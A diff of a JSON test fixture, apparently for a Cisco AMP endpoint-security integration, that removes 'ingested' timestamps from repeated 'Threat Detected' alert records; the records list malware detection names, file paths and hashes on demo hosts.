@@ -1804,7 +1783,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422893315Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "severity": 2 
@@ -1903,7 +1881,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422894224Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -1991,7 +1968,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422895319Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "severity": 2 
@@ -2090,7 +2066,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422896234Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -2178,7 +2153,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422897063Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "severity": 2 
@@ -2277,7 +2251,6 @@ ], "code": "1090519054", "id": "6176259028591575000", - "ingested": "2022-02-02T05:52:33.422897868Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -2361,7 +2334,6 @@ ], "code": "1090519054", "id": "6159251439135752000", - "ingested": "2022-02-02T05:52:33.422898673Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "severity": 2 
@@ -2460,7 +2432,6 @@ ], "code": "1090519054", "id": "6176258981346935000", - "ingested": "2022-02-02T05:52:33.422899596Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -2540,7 +2511,6 @@ ], "code": "1090519054", "id": "6176258929807327000", - "ingested": "2022-02-02T05:52:33.422900627Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -2620,7 +2590,6 @@ ], "code": "1090519054", "id": "6533668103677542000", - "ingested": "2022-02-02T05:52:33.422901438Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2710,7 +2679,6 @@ ], "code": "1090519054", "id": "6533668103677542000", - "ingested": "2022-02-02T05:52:33.422902321Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2796,7 +2764,6 @@ ], "code": "1090519054", "id": "6533668103677542000", - "ingested": "2022-02-02T05:52:33.422903227Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2886,7 +2853,6 @@ ], "code": "1090519054", "id": "6533667841684537000", - "ingested": "2022-02-02T05:52:33.422904047Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -2976,7 +2942,6 @@ ], "code": "1090519054", "id": "6533667841684537000", - "ingested": "2022-02-02T05:52:33.422904991Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -3062,7 +3027,6 @@ ], "code": "1090519054", "id": "6533667841684537000", - "ingested": "2022-02-02T05:52:33.422905820Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -3152,7 +3116,6 @@ ], "code": "1090519054", "id": "6176258118058508000", - "ingested": "2022-02-02T05:52:33.422906632Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat 